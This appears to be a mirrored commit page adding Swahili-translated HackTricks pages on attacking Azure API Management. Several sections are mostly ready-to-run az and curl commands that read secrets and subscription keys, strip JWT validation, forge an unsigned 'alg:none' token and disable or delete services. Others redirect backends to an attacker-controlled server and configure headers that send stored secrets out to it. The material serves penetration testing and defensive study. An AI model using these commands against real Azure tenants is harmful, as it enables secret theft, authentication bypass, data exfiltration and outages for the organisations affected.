gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-27 05:03:31 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-privilege-escalation

Browse Source
This commit is contained in:
Translator
2025-12-23 16:37:10 +00:00
parent ad8d8c8a7b
commit 1b5015c676
3 changed files with 319 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

75
src/pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md Normal file
View File

@@ -0,0 +1,75 @@
# Azure - API Management Post-Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## `Microsoft.ApiManagement/service/apis/policies/write` or `Microsoft.ApiManagement/service/policies/write`
Attacker anaweza kutumia multiple vectors kusababisha denial of service. Ili kuzuia legitimate traffic, attacker anaongeza rate-limiting na quota policies zenye thamani za chini mno, kwa ufanisi kuzuia normal access:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><rate-limit calls=\"1\" renewal-period=\"3600\" /><quota calls=\"10\" renewal-period=\"86400\" /><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'
```
Ili kuzuia anwani maalum za IP za wateja halali, mshambuliaji anaweza kuongeza sera za kuchuja IP zinazokataa maombi kutoka kwa anwani zilizochaguliwa:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><ip-filter action=\"forbid\"><address>1.2.3.4</address><address>1.2.3.5</address></ip-filter><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'
```
## `Microsoft.ApiManagement/service/backends/write` au `Microsoft.ApiManagement/service/backends/delete`
Kwa kusababisha maombi yafeli, mshambuliaji anaweza kubadilisha usanidi wa backend na kubadilisha URL yake kuwa anwani isiyo halali au isiyofikika:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://invalid-backend-that-does-not-exist.com",
"protocol": "http"
}
}'
```
Au futa backends:
```bash
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "If-Match=*"
```
## `Microsoft.ApiManagement/service/apis/delete`
Ili kufanya APIs muhimu zisipatikane, mshambulizi anaweza kuzifuta moja kwa moja kutoka kwenye API Management service:
```bash
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>?api-version=2024-05-01" \
--headers "If-Match=*"
```
## `Microsoft.ApiManagement/service/write` or `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`
Ili kuzuia ufikisho kutoka kwenye Internet, mshambuliaji anaweza kuzima ufikisho wa mtandao wa umma kwenye API Management service:
```bash
az rest --method PATCH \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"publicNetworkAccess": "Disabled"
}
}'
```
## `Microsoft.ApiManagement/service/subscriptions/delete`
Ili kuzuia upatikanaji kwa watumiaji halali, mshambuliaji anaweza kufuta API Management subscriptions:
```bash
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<apim-subscription-id>?api-version=2024-05-01" \
--headers "If-Match=*"
```
{{#include ../../../banners/hacktricks-training.md}}

170
src/pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md Normal file
View File

@@ -0,0 +1,170 @@
# Az - API Management Privesc
{{#include ../../../banners/hacktricks-training.md}}
## `Microsoft.ApiManagement/service/namedValues/read` & `Microsoft.ApiManagement/service/namedValues/listValue/action`
Shambulio linahusisha kufikia sensitive secrets zilizohifadhiwa katika Azure API Management Named Values, ama kwa moja kwa moja kupata secret values au kwa kutumia vibaya permissions ili kupata Key Vaultbacked secrets kupitia managed identities.
```bash
az apim nv show-secret --resource-group <resource-group> --service-name <service-name> --named-value-id <named-value-id>
```
## `Microsoft.ApiManagement/service/subscriptions/read` & `Microsoft.ApiManagement/service/subscriptions/listSecrets/action`
Kwa kila subscription, mshambuliaji anaweza kupata subscription keys kwa kutumia listSecrets endpoint kwa njia ya POST:
```bash
az rest --method POST \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<subscription-sid>/listSecrets?api-version=2024-05-01"
```
Jibu linajumuisha subscription primary key (primaryKey) na secondary key (secondaryKey). Kwa kutumia vifunguo hivi, mshambuliaji anaweza kuthibitisha utambulisho na kufikia APIs zilizochapishwa kupitia API Management Gateway:
```bash
curl -H "Ocp-Apim-Subscription-Key: <primary-key-or-secondary-key>" \
https://<service-name>.azure-api.net/<api-path>
```
Mshambuliaji anaweza kufikia APIs zote na bidhaa zinazohusishwa na usajili. Ikiwa usajili una ufikiaji wa bidhaa au APIs nyeti, mshambuliaji anaweza kupata taarifa za siri au kufanya operesheni zisizoruhusiwa.
## `Microsoft.ApiManagement/service/policies/write` or `Microsoft.ApiManagement/service/apis/policies/write`
Kwanza, mshambuliaji anapata sera ya sasa ya API:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/?api-version=2024-05-01&format=rawxml"
```
Mshambuliaji anaweza kubadilisha sera kwa njia mbalimbali kulingana na malengo yake. Kwa mfano, ili kuzima authentication, ikiwa sera inajumuisha JWT token validation, mshambuliaji anaweza kuondoa au comment out sehemu hiyo:
```xml
<policies>
<inbound>
<base />
<!-- JWT validation removed by the attacker -->
<!-- <validate-jwt header-name="Authorization" failed-validation-httpcode="401" >
...
</validate-jwt> -->
</inbound>
<backend>
<base />
</backend>
<outbound>
<base />
</outbound>
<on-error>
<base />
</on-error>
</policies>
```
Ili kuondoa udhibiti wa rate limiting na kuruhusu mashambulizi ya denial-of-service, mshambuliaji anaweza kuondoa au kuweka kama maoni sera za quota na rate-limit:
```xml
<policies>
<inbound>
<base />
<!-- Rate limiting removed by the attacker -->
<!-- <rate-limit calls="100" renewal-period="60" />
<quota-by-key calls="1000" renewal-period="3600" counter-key="@(context.Subscription.Id)" /> -->
</inbound>
...
</policies>
```
Ili kubadilisha backend route na kuelekeza trafiki kwa server inayodhibitiwa na mshambuliaji:
```xml
<policies>
...
<inbound>
<base />
<set-backend-service base-url="https://attacker-controlled-server.com" />
</inbound>
...
</policies>
```
Mshambuliaji kisha anatumia sera iliyohaririwa. Mwili wa ombi lazima uwe kitu cha JSON kinachojumuisha sera kwa muundo wa XML:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><base /></inbound><backend><base /></backend><outbound><base /></outbound><on-error><base /></on-error></policies>"
}
}'
```
## JWT Validation Misconfiguration
Mshambuliaji anahitaji kujua kwamba API inatumia uhalali wa token za JWT na kwamba sera imepangwa vibaya. Sera za uhalali za JWT zilizopangwa vibaya zinaweza kuwa na `require-signed-tokens="false"` au `require-expiration-time="false"`, ambayo inaruhusu huduma kukubali token zisizosainiwa au token ambazo hazijaisha kamwe.
Mshambuliaji huunda token ya JWT yenye madhara kwa kutumia none algorithm (unsigned):
```
# Header: {"alg":"none"}
# Payload: {"sub":"user"}
eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0.
```
Mshambuliaji anatuma ombi kwa API akitumia token hasidi:
```bash
curl -X GET \
-H "Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0." \
https://<apim>.azure-api.net/path
```
Ikiwa sera imepangwa vibaya na `require-signed-tokens="false"`, huduma itakubali token isiyosainiwa. Mshambulizi pia anaweza kuunda token bila expiration claim ikiwa `require-expiration-time="false"`.
## `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`
Mshambulizi kwanza anakagua usanidi wa mtandao wa sasa wa huduma:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01"
```
Mshambuliaji anapitia jibu la JSON ili kuthibitisha thamani za `publicNetworkAccess` na `virtualNetworkType`. Ikiwa `publicNetworkAccess` imewekwa kuwa false au `virtualNetworkType` imewekwa kuwa Internal, huduma imewekwa kwa ufikiaji wa kibinafsi.
Ili kufunua huduma kwa Intaneti, mshambuliaji lazima abadilishe mipangilio yote miwili. Ikiwa huduma inaendesha katika mode ya ndani (`virtualNetworkType: "Internal"`), mshambuliaji anaiweka kuwa None au External na kuwezesha ufikiaji wa mtandao wa umma. Hii inaweza kufanywa kwa kutumia Azure Management API:
```bash
az rest --method PATCH \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"publicNetworkAccess": "Enabled",
"virtualNetworkType": "None"
}
}'
```
Baada `virtualNetworkType` inapowekwa kuwa `None` au `External` na `publicNetworkAccess` ikiwa imewezeshwa, huduma na API zake zote zinaweza kupatikana kutoka kwenye Internet, hata kama hapo awali zililindwa nyuma ya mtandao wa kibinafsi au private endpoints.
## `Microsoft.ApiManagement/service/backends/write`
Mshambuliaji awali huorodhesha backends zilizopo ili kubaini ipi ya kubadilisha:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends?api-version=2024-05-01"
```
Attacker anapata usanidi wa sasa wa backend anayotaka kuibadilisha:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01"
```
Mshambuliaji anabadilisha backend URL ili kuielekeza kwenye server wanayodhibiti. Kwanza, wanapata ETag kutoka kwa jibu la awali na kisha wanaposasisha backend:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://attacker-controlled-server.com",
"protocol": "http",
"description": "Backend modified by attacker"
}
}'
```
Vinginevyo, mshambuliaji anaweza kusanidi backend headers ili exfiltrate Named Values containing secrets. Hii inafanywa kupitia backend credentials configuration:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://attacker-controlled-server.com",
"protocol": "http",
"credentials": {
"header": {
"X-Secret-Value": ["{{named-value-secret}}"]
}
}
}
}'
```
Kwa usanidi huu, Named Values zinatumwa kama headers katika maombi yote kwenda kwa attacker-controlled backend, kuruhusu exfiltration ya sensitive secrets.
{{#include ../../../banners/hacktricks-training.md}}

74
src/pentesting-cloud/azure-security/az-services/az-api-management.md Normal file
View File

@@ -0,0 +1,74 @@
# Az - API Management
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
Azure API Management (APIM) ni huduma inayosimamiwa kikamilifu inayotoa **jukwaa lililounganishwa kwa kuchapisha, kulinda, kubadilisha, kusimamia, na kufuatilia APIs**. Inawawezesha mashirika **kuweka mkakati wao wa API katikati** na kuhakikisha utawala, utendaji, na usalama vinavyolingana kwa huduma zao zote. Kwa kutumika kama tabaka la utofauti kati ya huduma za backend na watumiaji wa API, APIM inarahisisha ujumuishaji na kuboresha utunzaji wa msimbo huku ikitoa uwezo muhimu wa uendeshaji na usalama.
## Core Concepts
**The API Gateway** inatumika kama mlango mmoja wa kuingia kwa trafiki yote ya API, ikiendesha kazi kama kusambaza maombi kwa huduma za backend, kutekeleza mipaka ya rate limits, kuhifadhi majibu (caching), na kusimamia authentication na authorization. Gateway hii inahostiwa na kusimamiwa kikamilifu na Azure, ikiweka uhakika wa upatikana mkubwa na scalability.
**The Developer Portal** hutoa mazingira ya kujihudumia ambapo watumiaji wa API wanaweza kugundua APIs zilizopo, kusoma nyaraka, na kujaribu endpoints. Inasaidia kurahisisha onboarding kwa kutoa zana za mwingiliano na upatikanaji wa taarifa za subscription.
**The Management Portal (Management Plane)** inatumiwa na wasimamizi kusanidi na kuendeleza huduma ya APIM. Kutoka hapa, watumiaji wanaweza kufafanua APIs na operations, kusanidi access control, kutumia policies, kusimamia watumiaji, na kupanga APIs katika products. Portal hii inajumuisha utawala na kuhakikisha udhibiti wa API uliofanana.
## Authentication and Authorization
Azure API Management inaunga mkono mbinu kadhaa za **authentication** ili kulinda upatikanaji wa API. Hizi ni pamoja na **subscription keys**, **OAuth 2.0 tokens**, na **client certificates**. APIM pia inaunganishwa asili na **Microsoft Entra ID**, ikiwaruhusu usimamizi wa utambulisho wa ngazi ya kampuni na upatikanaji salama kwa APIs na huduma za backend.
## Policies
Sera (Policies) katika APIM zinamruhusu msimamizi kubinafsisha **utekelezaji wa maombi na majibu** kwa ngazi mbalimbali, ikijumuisha ngazi ya **service**, **API**, **operation**, au **product**. Kupitia policies, inawezekana kutekeleza **JWT token validation**, **kubadilisha payloads za XML au JSON**, **kutoa rate limiting**, **kuzuia miito kwa anwani za IP**, au **kuthibitisha dhidi ya backend services kutumia managed identities**. Policies ni **zilisambazwa kwa njia iliyofaa** na ni mojawapo ya **nguvu kuu** za jukwaa la API Management, zikiwezesha **udhibiti wa kina wa tabia za runtime** bila kuharibu backend code.
## Named Values
Huduma inatoa utaratibu uitwao **Named Values**, ambao unaruhusu kuhifadhi **taarifa za kusanidi** kama **secrets**, **API keys**, au thamani nyingine zinazohitajika na policies.
Thamani hizi zinaweza kuhifadhiwa moja kwa moja ndani ya APIM au kurejelewa kwa usalama kutoka kwa **Azure Key Vault**. Named Values zinakuza **usimamizi salama na uliolengwa wa data za kusanidi** na kurahisisha uandishi wa policies kwa kuruhusu **marejeleo yanayoweza kutumika tena** badala ya thamani zilizo hardcoded.
## Networking and Security Integration
Azure API Management inaunganishwa kwa ufanisi na **virtual network environments**, ikiwezesha **muunganisho wa kibinafsi na salama** kwa mifumo ya backend.
Itakapowekwa ndani ya **Virtual Network (VNet)**, APIM inaweza kufikia **huduma za ndani** bila kuziweka hadharani. Huduma pia inaruhusu usanidi wa **custom certificates** ili kuunga mkono **mutual TLS authentication** na backend services, kuboresha usalama katika matukio yanayohitaji **uthibitishaji thabiti wa utambulisho**.
Sifa hizi za **mtandao** zinafanya APIM iwefaa kwa miundo ya **cloud-native** na **hybrid architectures**.
### Enumerate
Ili kuchunguza huduma ya API management:
```bash
# Lists all Named Values configured in the Azure API Management instance
az apim nv list --resource-group <resource-group> --service-name <service-name>
# Retrieves all policies applied at the API level in raw XML format
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/?api-version=2024-05-01&format=rawxml"
# Retrieves the effective policy for a specific API in raw XML format
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01&format=rawxml"
# Gets the configuration details of the APIM service instance
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01"
# Lists all backend services registered in the APIM instance
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends?api-version=2024-05-01"
# Retrieves details of a specific backend service
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01"
# Gets general information about the APIM service
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01"
# Calls an exposed API endpoint through the APIM gateway
curl https://<apim>.azure-api.net/<api-path>
```
{{#include ../../../banners/hacktricks-training.md}}